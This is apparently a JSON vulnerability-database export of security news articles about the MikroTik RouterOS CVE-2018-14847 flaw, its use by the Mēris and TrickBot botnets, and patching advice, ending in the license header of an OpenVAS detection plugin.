MikroTik Routers Hacked to Eavesdrop On Network Traffic", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 6.4, "vectorString": 
"AV:N/AC:L/Au:N/C:P/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 4.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-14847"], "modified": "2018-09-04T09:53:15", "id": "THN:31DAF3FB72A6AB73A54307C968C6570C", "href": "https://thehackernews.com/2018/09/mikrotik-router-hacking.html", "cvss": {"score": 6.4, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:N"}}, {"lastseen": "2022-05-09T12:37:26", "description": "[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEhrQSwzO7KEvdvTfdyIeP543kn1Qr0VJBUyRqyXqgfP0hCansX62NjkJQByAjcyCGsNS3K0FqxLXVKIXsuLKO2MRtP6XG3pfLQlxJeBXu9ahcLMROkj1SlcUhQuH_Vb-quc0rkPxaHmwhClG-aFNuroc6WSbSCewRriPJMXwCRqZkHGccZlsAQVJizW/s728-e100/mikrotik-router-hacking-attack.png>)\n\nVulnerable routers from MikroTik have been misused to form what cybersecurity researchers have called one of the largest botnet-as-a-service cybercrime operations seen in recent years. \n\nAccording to a new piece of research published by Avast, a cryptocurrency mining campaign leveraging the new-disrupted [Glupteba botnet](<https://thehackernews.com/2021/12/google-disrupts-blockchain-based.html>) as well as the infamous TrickBot malware were all distributed using the same command-and-control (C2) server.\n\n\"The C2 server serves as a botnet-as-a-service controlling nearly 230,000 vulnerable MikroTik routers,\" Avast's senior malware researcher, Martin Hron, [said](<https://decoded.avast.io/martinhron/meris-and-trickbot-standing-on-the-shoulders-of-giants/>) in a write-up, potentially linking it to what's now called the M\u0113ris botnet.\n\nThe botnet is known to exploit a known vulnerability in the Winbox component of MikroTik routers ([CVE-2018-14847](<https://thehackernews.com/2021/12/over-300000-mikrotik-devices-found.html>)), enabling the attackers to gain unauthenticated, remote administrative access to any affected device. 
Parts of the M\u0113ris botnet were [sinkholed](<https://rt-solar.ru/events/news/2343/>) in late [September 2021](<https://therecord.media/russian-security-firm-sinkholes-part-of-the-dangerous-meris-ddos-botnet/>).\n\n\"The [CVE-2018-14847](<https://thehackernews.com/2018/08/mikrotik-router-hacking.html>) vulnerability, which was publicized in 2018, and for which MikroTik issued a fix, allowed the cybercriminals behind this botnet to enslave all of these routers, and to presumably rent them out as a service,\" Hron said.\n\nIn an attack chain observed by Avast in July 2021, vulnerable MikroTik routers were targeted to retrieve the first-stage payload from a domain named bestony[.]club, which was then used to fetch additional scripts from a second domain, \"globalmoby[.]xyz.\"\n\nInterestingly enough, both domains were linked to the same IP address, 116.202.93[.]14, leading to the discovery of seven more domains that were actively used in attacks, one of which (tik.anyget[.]ru) was used to serve Glupteba malware samples to targeted hosts.\n\n\"When requesting the URL https://tik.anyget[.]ru I was redirected to the https://routers.rip/site/login domain (which is again hidden by the Cloudflare proxy),\" Hron said. 
\"This is a control panel for the orchestration of enslaved MikroTik routers,\" with the page displaying a live counter of devices connected into the botnet.\n\nBut after details of the M\u0113ris botnet entered [public domain](<https://thehackernews.com/2021/09/meris-botnet-hit-russias-yandex-with.html>) in early September 2021, the C2 server is said to have abruptly stopped serving scripts before disappearing completely.\n\nThe disclosure also coincides with a [new report](<https://thehackernews.com/2022/03/trickbot-malware-abusing-hacked-iot.html>) from Microsoft, which revealed how the TrickBot malware has weaponized MikroTik routers as proxies for command-and-control communications with the remote servers, raising the possibility that the operators may have used the same botnet-as-a-service.\n\nIn light of these attacks, it's recommended that users update their routers with the latest security patches, set up a strong router password, and disable the router's administration interface from the public side.\n\n\"It also shows, what is quite obvious for some time already, that IoT devices are being heavily targeted not just to run malware on them, which is hard to write and spread massively considering all the different architectures and OS versions, but to simply use their legal and built-in capabilities to set them up as proxies,\" Hron said. \"This is done to either anonymize the attacker's traces or to serve as a DDoS amplification tool.\"\n\n**_Update:_** Latvian company MikroTik told The Hacker News that the number \"was only true before we released the patch in [the] year 2018. After patch was released, the actual affected number of devices is closer to 20,000 units that still run the older software. 
Also, not all of them are actually controlled by the botnet, many of them have a strict firewall in place, even though running older software.\"\n\nWhen reached for comment, Avast confirmed that the number of affected devices (~230,000) reflected the status of the botnet prior to its disruption. \"However, there are still isolated routers with compromised credentials or staying unpatched on the internet,\" the company said in a statement.\n\n_(The headline of the article has been corrected to take into account the fact that the number of affected MikroTik routers is no longer more than 200,000 as previously stated.)_\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.1, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.2}, "published": "2022-03-23T09:49:00", "type": "thn", "title": "Botnet of Thousands of MikroTik Routers Abused in Glupteba, TrickBot Campaigns", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 6.4, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 4.9, "acInsufInfo": false, 
"obtainUserPrivilege": false}, "cvelist": ["CVE-2018-14847"], "modified": "2022-03-24T02:39:20", "id": "THN:359CE3E905570B30722F914C18196DEB", "href": "https://thehackernews.com/2022/03/over-200000-microtik-routers-worldwide.html", "cvss": {"score": 6.4, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:N"}}, {"lastseen": "2022-05-09T12:37:27", "description": "[](<https://thehackernews.com/new-images/img/a/AVvXsEjtABJtT4zheeL0GMjWhl2OjB3Do_4F7ldpyEPdM_cfDSLIJU8NaQk_VLf7iknCvtaVVH7IC21zhlVJUfWSa8SxMjevGqJqVH0JW480uIDFhKz-M107U4ZX5oOYC_HkCLNPWd1C_B_whSRDYpoJVl-EjsCQcwPGktu3RIhNMEVHcvuB5EOa4PO0ebGT>)\n\nMicrosoft on Wednesday detailed a previously undiscovered technique put to use by the TrickBot malware that involves using compromised Internet of Things (IoT) devices as a go-between for establishing communications with the command-and-control (C2) servers.\n\n\"By using MikroTik routers as proxy servers for its C2 servers and redirecting the traffic through non-standard ports, TrickBot adds another persistence layer that helps malicious IPs evade detection by standard security systems,\" Microsoft's Defender for IoT Research Team and Threat Intelligence Center (MSTIC) [said](<https://www.microsoft.com/security/blog/2022/03/16/uncovering-trickbots-use-of-iot-devices-in-command-and-control-infrastructure/>).\n\nTrickBot, which emerged as a banking trojan in 2016, has evolved into a sophisticated and persistent threat, with its modular architecture enabling it to adapt its tactics to suit different networks, environments, and devices as well as offer access-as-a-service for next-stage payloads like Conti ransomware.\n\nThe expansion to TrickBot's capabilities comes amid reports of its [infrastructure going offline](<https://thehackernews.com/2022/03/trickbot-malware-gang-upgrades-its.html>), even as the botnet has continually refined its features to make its attack framework durable, evade reverse engineering, and maintain the stability of its C2 
servers.\n\nSpecifically, the new method identified by MSTIC involves leveraging hacked IoT devices such as routers from MikroTik to \"create a line of communication between the TrickBot-affected device and the C2 server.\"\n\nThis also entails breaking into the routers by using a combination of methods, namely default passwords, brute-force attacks, or exploiting a now-patched flaw in MikroTik RouterOS ([CVE-2018-14847](<https://blog.mikrotik.com/security/winbox-vulnerability.html>)), followed by changing the router's password to maintain access.\n\nIn the next step, the attackers then [issue](<https://github.com/microsoft/routeros-scanner>) a network address translation (NAT) command that's designed to redirect traffic between ports 449 and 80 in the router, establishing a path for the TrickBot-infected hosts to communicate with the C2 server.\n\nWhile potential connections between TrickBot and compromised MikroTik hosts were hinted at before in [November 2018](<https://orangecyberdefense.com/uk/blog/cyberdefense/the-trickbot-and-mikrotik-connection/>), this is the first time the exact modus operandi has been laid bare. With the malware [reaching its limits](<https://thehackernews.com/2022/02/notorious-trickbot-malware-gang-shuts.html>) last month and no new C2 servers registered since December 2021, it remains to be seen how the malware authors intend to take the operation forward.\n\n\"As security solutions for conventional computing devices continue to evolve and improve, attackers will explore alternative ways to compromise target networks,\" the researchers said. 
\"Attack attempts against routers and other IoT devices are not new, and being unmanaged, they can easily be the weakest links in the network.\"\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.1, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.2}, "published": "2022-03-17T10:05:00", "type": "thn", "title": "TrickBot Malware Abusing MikroTik Routers as Proxies for Command-and-Control", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 6.4, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 4.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-14847"], "modified": "2022-03-21T05:49:06", "id": "THN:B6838707858897EC6614B5E5C61FDE23", "href": "https://thehackernews.com/2022/03/trickbot-malware-abusing-hacked-iot.html", "cvss": {"score": 6.4, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:N"}}, {"lastseen": "2021-09-11T12:35:29", "description": "[](<https://thehackernews.com/images/-6DBIyL-dibY/YTyQNcwhq6I/AAAAAAAADxs/VB8XNXC1KVsHh9raOrvyH6QfJr-JIBguwCLcBGAsYHQ/s0/yandex.gif>)\n\nRussian internet giant Yandex has been 
the target of a record-breaking distributed denial-of-service (DDoS) attack by a new botnet called M\u0113ris.\n\nThe botnet is believed to have pummeled the company's web infrastructure with millions of HTTP requests, before hitting a peak of 21.8 million requests per second (RPS), dwarfing a recent botnet-powered attack that came to light last month, [bombarding](<https://thehackernews.com/2021/08/cloudflare-mitigated-one-of-largest.html>) an unnamed Cloudflare customer in the financial industry with 17.2 million RPS.\n\nRussian DDoS mitigation service Qrator Labs, which disclosed details of the attack on Thursday, called [M\u0113ris](<https://blog.qrator.net/en/meris-botnet-climbing-to-the-record_142/>) \u2014 meaning \"Plague\" in the Latvian language \u2014 a \"botnet of a new kind.\" \n\n\"It is also clear that this particular botnet is still growing. There is a suggestion that the botnet could grow in force through password brute-forcing, although we tend to neglect that as a slight possibility. That looks like some vulnerability that was either kept secret before the massive campaign's start or sold on the black market,\" the researchers noted, adding M\u0113ris \"can overwhelm almost any infrastructure, including some highly robust networks [\u2026] due to the enormous RPS power that it brings along.\"\n\nThe DDoS attacks leveraged a technique called HTTP pipelining that allows a client (i.e., a web browser) to open a connection to the server and make multiple requests without waiting for each response. 
The malicious traffic originated from over 250,000 infected hosts, primarily network devices from MikroTik, with evidence pointing to a spectrum of [RouterOS](<https://mikrotik.com/software>) versions that have been weaponized by exploiting as-yet-unknown vulnerabilities.\n\nBut in a forum post, the Latvian network equipment manufacturer said these attacks employ the same set of routers that were compromised via a 2018 vulnerability ([CVE-2018-14847](<https://nvd.nist.gov/vuln/detail/cve-2018-14847>), CVSS score: 9.1) that has since been patched and that there are no new (zero-day) vulnerabilities impacting the devices.\n\n\"Unfortunately, closing the vulnerability does not immediately protect these routers. If somebody got your password in 2018, just an upgrade will not help. You must also change your password, re-check your firewall if it does not allow remote access to unknown parties, and look for scripts that you did not create,\" it [noted](<https://forum.mikrotik.com/viewtopic.php?f=21&t=178417>).\n\nM\u0113ris has also been linked to a number of DDoS attacks, including the one mitigated by Cloudflare, with the researchers noting the overlaps in \"durations and distributions across countries.\"\n\nWhile it's highly recommended to upgrade MikroTik devices to the latest firmware to combat any potential botnet attacks, organizations are also advised to change their administration passwords to safeguard against brute-force attempts.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "HIGH", "baseScore": 9.1, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.2}, "published": "2021-09-11T11:18:00", "type": "thn", "title": "M\u0113ris Botnet Hit Russia's Yandex With Massive 22 Million RPS DDoS Attack", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 6.4, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 4.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-14847"], "modified": "2021-09-11T11:18:02", "id": "THN:EF8F680E8C0B204C481C9D7B5974A0A7", "href": "https://thehackernews.com/2021/09/meris-botnet-hit-russias-yandex-with.html", "cvss": {"score": 6.4, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:N"}}, {"lastseen": "2022-05-09T12:40:48", "description": "A known vulnerability in MikroTik routers is potentially far more dangerous than previously thought. 
\n \nA cybersecurity researcher from Tenable Research has released a new proof-of-concept (PoC) RCE attack for an old directory traversal vulnerability that was found and patched within a day of its discovery in April this year. \n \nThe vulnerability, identified as CVE-2018-14847, was initially rated as medium in severity but should now be rated critical because the new hacking technique used against vulnerable MikroTik routers allows attackers to remotely execute code on affected devices and gain a root shell. \n \nThe vulnerability impacts Winbox\u2014a management component for administrators to set up their routers using a Web-based interface\u2014and a Windows GUI application for the RouterOS software used by the MikroTik devices. \n \nThe vulnerability allows \"remote attackers to bypass authentication and read arbitrary files by modifying a request to change one byte related to a Session ID.\" \n \n\n\n### New Hack Turned 'Medium' MikroTik Vulnerability Into 'Critical'\n\n \nHowever, the new attack method found by Tenable Research exploits the same vulnerability and takes it one step further. \n \nA PoC exploit, called \"[By the Way](<https://github.com/tenable/routeros/tree/master/poc/bytheway>),\" released by Tenable Research's Jacob Baines, first uses the directory traversal vulnerability to steal administrator login credentials from the user database file and then writes another file on the system to gain root shell access remotely. \n \nIn other words, the new exploit could allow unauthorized attackers to hack MikroTik's RouterOS system, deploy malware payloads or bypass router firewall protections. 
\n \nThe technique is yet another security blow [against MikroTik routers](<https://thehackernews.com/2018/08/mikrotik-router-hacking.html>), which were previously targeted by the [VPNFilter malware](<https://thehackernews.com/2018/09/vpnfilter-router-hacking.html>) and used in an extensive [cryptojacking campaign](<https://thehackernews.com/2018/09/mikrotik-router-hacking.html>) uncovered a few months ago. \n \n\n\n### New MikroTik Router Vulnerabilities\n\nBesides this, Tenable Research also [disclosed](<https://www.tenable.com/blog/tenable-research-advisory-multiple-vulnerabilities-discovered-in-mikrotiks-routeros>) additional MikroTik RouterOS vulnerabilities, including: \n \n\n\n * CVE-2018-1156\u2014A stack buffer overflow flaw that could allow authenticated remote code execution, allowing attackers to gain full system access and access to any internal system that uses the router.\n * CVE-2018-1157\u2014A file upload memory exhaustion flaw that allows an authenticated remote attacker to crash the HTTP server.\n * CVE-2018-1159\u2014A www memory corruption flaw that could crash the HTTP server by rapidly authenticating and disconnecting.\n * CVE-2018-1158\u2014A recursive parsing stack exhaustion issue that could crash the HTTP server via recursive parsing of JSON.\n \n \nThe vulnerabilities impact Mikrotik RouterOS firmware versions before 6.42.7 and 6.40.9. \n \nTenable Research reported the issues to MikroTik in May, and the company addressed the vulnerabilities by releasing its RouterOS versions 6.40.9, 6.42.7 and 6.43 in August. \n \nWhile all the vulnerabilities were patched over a month ago, a recent scan by Tenable Research revealed that 70 percent of routers (equal to roughly 200,000 devices) are still vulnerable to attack. \n \nThe bottom line: If you own a MikroTik router and you have not updated its RouterOS, you should do it right now. 
\n \nAlso, if you are still using default credentials on your router, it is high time to change the default password and keep a unique, long and complex password.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.1, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.2}, "published": "2018-10-08T15:34:00", "type": "thn", "title": "New Exploit for MikroTik Router WinBox Vulnerability Gives Full Root Access", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-1156", "CVE-2018-1157", "CVE-2018-1158", "CVE-2018-1159", "CVE-2018-14847"], "modified": "2018-10-08T15:34:52", "id": "THN:15F5633BC0BA0C82579744CCACA99558", "href": "https://thehackernews.com/2018/10/router-hacking-exploit.html", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2022-05-09T12:37:49", "description": "[](<https://thehackernews.com/new-images/img/a/AVvXsEix1GGoHWyTZLIUNdkduXaLWZZLCDe-TrjKwb4KKIrRL4PHcksUfqokWOurA4_ELZuNKNgm7Lzql76g_MpF-S_rgaKWevi5N6GiIt-9KqwMvkGlA2FQ-8z0y745lviXIaO0r3idvFlLM9TuheAqeofoGLiUva3NgbZcTa9dIglhiqGnTrSFOQSgRIlQ>)\n\nAt least 300,000 IP addresses associated with MikroTik devices have been found vulnerable to multiple remotely exploitable security vulnerabilities 
that have since been patched by the popular supplier of routers and wireless ISP devices.\n\nThe most affected devices are located in China, Brazil, Russia, Italy, Indonesia, with the U.S. coming in at number eight, cybersecurity firm Eclypsium said in a report shared with The Hacker News.\n\n\"These devices are both powerful, [and] often highly vulnerable,\" the researchers [noted](<https://eclypsium.com/2021/12/09/when-honey-bees-become-murder-hornets/>). \"This has made MikroTik devices a favorite among threat actors who have commandeered the devices for everything from DDoS attacks, command-and-control (aka 'C2'), traffic tunneling, and more.\"\n\nMikroTik devices are an enticing target not least because there are more than two million of them deployed worldwide, posing a huge attack surface that can be leveraged by threat actors to mount an array of intrusions.\n\nIndeed, earlier this September, reports emerged of a new botnet named [M\u0113ris](<https://thehackernews.com/2021/09/meris-botnet-hit-russias-yandex-with.html>) that staged a record-breaking distributed denial-of-service (DDoS) attack against Russian internet company Yandex by using network devices from Mikrotik as an attack vector by exploiting a now-addressed security vulnerability in the operating system ([CVE-2018-14847](<https://blog.mikrotik.com/security/winbox-vulnerability.html>)).\n\nThis is not the first time MikroTik routers have been [weaponized](<https://thehackernews.com/2018/10/router-hacking-exploit.html>) in real world attacks. In 2018, cybersecurity firm Trustwave [discovered](<https://thehackernews.com/2018/08/mikrotik-router-hacking.html>) at least three massive malware campaigns exploiting hundreds of thousands of unpatched MikroTik routers to secretly install cryptocurrency miners on computers connected to them. 
The same year, China's Netlab 360 [reported](<https://thehackernews.com/2018/09/mikrotik-router-hacking.html>) that thousands of vulnerable MikroTik routers had been surreptitiously corralled into a botnet by leveraging CVE-2018-14847 to eavesdrop on network traffic.\n\n[](<https://thehackernews.com/new-images/img/a/AVvXsEjf-4TWedeGUlB_bMho_dY9tqYdz2Kvj7mLWtDTd0RfxyFAPtJXH2iyPwIJiltFNdCSHJBCWFoXv1M8Qr4AmqvvTF1dqJ33YucavckSpyBXtrf9w8Pna61zVy5EClw8XTx0MaP6ip-wBZn1j981BgwLTMh-GaRILYXmEwAs1Mkn1CbIkUXo7jicATJX>)\n\nCVE-2018-14847 is also among the four unaddressed vulnerabilities discovered over the last three years and which could enable full takeover of MikroTik devices -\n\n * [**CVE-2019-3977**](<https://nvd.nist.gov/vuln/detail/CVE-2019-3977>) (CVSS score: 7.5) - MikroTik RouterOS insufficient validation of upgrade package's origin, allowing a reset of all usernames and passwords\n * [**CVE-2019-3978**](<https://nvd.nist.gov/vuln/detail/CVE-2019-3978>) (CVSS score: 7.5) - MikroTik RouterOS insufficient protections of a critical resource, leading to cache poisoning\n * [**CVE-2018-14847**](<https://nvd.nist.gov/vuln/detail/CVE-2018-14847>) (CVSS score: 9.1) - MikroTik RouterOS directory traversal vulnerability in the WinBox interface\n * [**CVE-2018-7445**](<https://nvd.nist.gov/vuln/detail/CVE-2018-7445>) (CVSS score: 9.8) - MikroTik RouterOS SMB buffer overflow vulnerability\n\nIn addition, Eclypsium researchers said they found 20,000 exposed MikroTik devices that injected cryptocurrency mining scripts into web pages that users visited.\n\n\"The ability for compromised routers to inject malicious content, tunnel, copy, or reroute traffic can be used in a variety of highly damaging ways,\" the researchers said. 
\"DNS poisoning could redirect a remote worker's connection to a malicious website or introduce a machine-the-middle.\"\n\n[](<https://thehackernews.com/new-images/img/a/AVvXsEhMqn1SEjfxCQg0TlmBiRLjns0oxiNeJVLGXoWWhWiK8dgSFy0p3HPV-OqMPAYNzppLMBBv9DcbckRiwOOq1Y1WX0dsivBlkPWPsOjRkalNB-gaEQGLm3g11ijAzOl1tJr6T5DfWiAzLCP4gtQd-zgTHz8jCpvtouAWe7ipGxduIgP3puqfo_C43uoR>)\n\n\"An attacker could use well-known techniques and tools to potentially capture sensitive information such as stealing [MFA](<https://en.wikipedia.org/wiki/Multi-factor_authentication>) credentials from a remote user using SMS over WiFi. As with previous attacks, enterprise traffic could be tunneled to another location or malicious content injected into valid traffic,\" the researchers added.\n\nMikroTik routers are far from the only devices to have been co-opted into a botnet. Researchers from Fortinet this week disclosed how the [Moobot botnet](<https://www.fortinet.com/blog/threat-research/mirai-based-botnet-moobot-targets-hikvision-vulnerability>) is leveraging a known remote code execution (RCE) vulnerability in Hikvision video surveillance products ([CVE-2021-36260](<https://nvd.nist.gov/vuln/detail/CVE-2021-36260>)) to grow its network, and use the compromised devices to launch distributed denial-of-service (DDoS) attacks.\n\nIn a separate [report](<https://www.fortinet.com/blog/threat-research/manga-aka-dark-mirai-based-campaign-targets-new-tp-link-router-rce-vulnerability>), the enterprise cybersecurity firm said that the operators of a botnet known as Manga aka Dark Mirai are actively abusing a recently disclosed post-authenticated remote code execution vulnerability ([CVE-2021-41653](<https://nvd.nist.gov/vuln/detail/CVE-2021-41653>)) to hijack TP-Link routers and co-opt the appliances to their network of infected devices.\n\n## Update\n\nIn a statement shared with The Hacker News, the Latvian company said that \"there are no new vulnerabilities in RouterOS,\" while stressing that keeping the 
operating system up to date is an \"essential step to avoid all kinds of vulnerabilities.\"\n\n\"Unfortunately, closing the old vulnerability does not immediately protect the affected routers. We don't have an illegal backdoor to change the user's password and check their firewall or configuration. These steps must be done by the users themselves,\" the company explained.\n\n\"We try our best to reach out to all users of RouterOS and remind them to do software upgrades, use secure passwords, check their firewall to restrict remote access to unfamiliar parties, and look for unusual scripts. Unfortunately, many users have never been in contact with MikroTik and are not actively monitoring their devices. We cooperate with various institutions worldwide to look for other solutions as well.\"\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-12-09T11:15:00", "type": "thn", "title": "Over 300,000 MikroTik Devices Found Vulnerable to Remote Hacking Bugs", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": 
"AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-14847", "CVE-2018-7445", "CVE-2019-3977", "CVE-2019-3978", "CVE-2021-36260", "CVE-2021-41653"], "modified": "2021-12-10T11:53:59", "id": "THN:C96E59A0B083B41A78F431F292E7E1D5", "href": "https://thehackernews.com/2021/12/over-300000-mikrotik-devices-found.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "hackread": [{"lastseen": "2018-10-10T00:22:42", "description": "By [Waqas](<https://www.hackread.com/author/hackread/>)\n\nTenable Research\u2019s cybersecurity researcher has released \u201cBy The way,\u201d which is a new PoC (proof-of-concept) RCE attack after identifying a new attack method to exploit an already discovered vulnerability in MikroTik routers. The vulnerability, identified as CVE-2018-14847, is an old directory traversal flaw, which was patched the same day it was detected in April, 2018. 
[\u2026]\n\nThis is a post from HackRead.com Read the original post: [MikroTik router vulnerability lets hackers bypass firewall to load malware undetected](<https://www.hackread.com/mikrotik-router-vulnerability-hackers-bypass-firewall-malware/>)", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "HIGH", "baseScore": 9.1, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.2}, "published": "2018-10-09T17:37:16", "type": "hackread", "title": "MikroTik router vulnerability lets hackers bypass firewall to load malware undetected", "bulletinFamily": "blog", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 6.4, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 4.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-14847"], "modified": "2018-10-09T17:37:16", "id": "HACKREAD:38EFBBF180E0993C3CC665D79BC0B551", "href": "https://www.hackread.com/mikrotik-router-vulnerability-hackers-bypass-firewall-malware/", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}], "openvas": [{"lastseen": "2019-05-29T18:32:38", "description": "This host is running Mikrotik RouterOS and is prone to information\ndisclosure vulnerability.", "cvss3": {}, "published": "2018-07-06T00:00:00", "type": "openvas", "title": "Mikrotik RouterOS 'Winbox Service' Information Disclosure Vulnerability (Active Check)", 
"bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-14847"], "modified": "2019-03-11T00:00:00", "id": "OPENVAS:1361412562310141279", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310141279", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_mikrotik_router_os_winbox_info_disc_vuln_active.nasl 14086 2019-03-11 09:05:57Z mmartin $\n#\n# Mikrotik RouterOS 'Winbox Service' Information Disclosure Vulnerability (Active Check)\n#\n# Authors:\n# Christian Kuersteiner <christian.kuersteiner@greenbone.net>\n#\n# Copyright:\n# Copyright (c) 2018 Greenbone Networks GmbH\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation; either version 2 of the License, or\n# (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# 